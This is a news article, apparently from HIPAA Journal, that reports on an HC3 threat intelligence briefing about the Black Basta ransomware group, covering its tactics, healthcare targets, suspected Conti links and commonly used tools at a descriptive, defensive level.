HC3 Shares Black Basta Ransomware Threat Intelligence Data
The Health Sector Cybersecurity Coordination Center (HC3) has shared threat intelligence information about the Black Basta ransomware group to help network defenders prevent and rapidly detect attacks in progress. The Black Basta group was first identified in April 2022 and is known to conduct ransomware and extortion attacks. The group engages in double extortion tactics, exfiltrating sensitive data and encrypting files, then issues threats to publish the data on its data leak site if the ransom is not paid. The group is also known to conduct extortion-only attacks without file encryption.
While the group has only been in operation for a relatively short time, it is clear that the group has extensive experience in ransomware attacks, as in the first two weeks of operation the group is known to have conducted at least 20 ransomware attacks. The Russian-speaking threat group is believed to include former members of the Conti and BlackMatter ransomware operations and uses similar tactics, techniques, and procedures to those groups and is thought to have links to the FIN7 threat group. It is highly probable that the group has conducted ransomware attacks in the past under a different name, with some security researchers believing Black Basta is a rebrand of Conti. Conti was officially disbanded in May 2022 and it is thought that the group split into several smaller operations.
Black Basta consists of highly capable individuals well-versed in conducting ransomware attacks. The group has conducted attacks on several healthcare and public sector (HPH) healthcare organizations, including health information technology companies, healthcare industry service providers, laboratories and pharmaceutical firms, and health plans. The vast majority of its victims are located in the United States, although the group has started conducting attacks in other countries, primarily the Five Eyes countries (USA, Australia, Canada, New Zealand, and the United Kingdom).
Black Basta is known for carefully choosing its targets and has attacked many critical infrastructure entities. The attacks are believed to be financially motivated, rather than linked to the Russian government, although it is possible that the group also has some sort of political agenda based on the countries that are typically targeted. The group does not rely on one method of attack and often uses a unique approach in attacks on specific targets. The group is known to purchase access to systems from initial access brokers. Once access is gained, the group uses a variety of tools for remote access, privilege escalation, lateral movement, and data exfiltration, including Qakbot/QBot, SystemBC, Mimikatz, ColbaltStrike, and Rclone. Additional methods of access include the exploitation of vulnerabilities, Remote Desktop Protocol, phishing, web injections, malicious downloads, and repackaged/infected software installers.
Get The FREE
HIPAA Compliance Checklist
Immediate Delivery of Checklist Link To Your Email Address
Please Enter Correct Email Address
Your Privacy Respected
HIPAA Journal Privacy Policy
You can view the full analysis of the group along with the recommended defensive measures and mitigations here.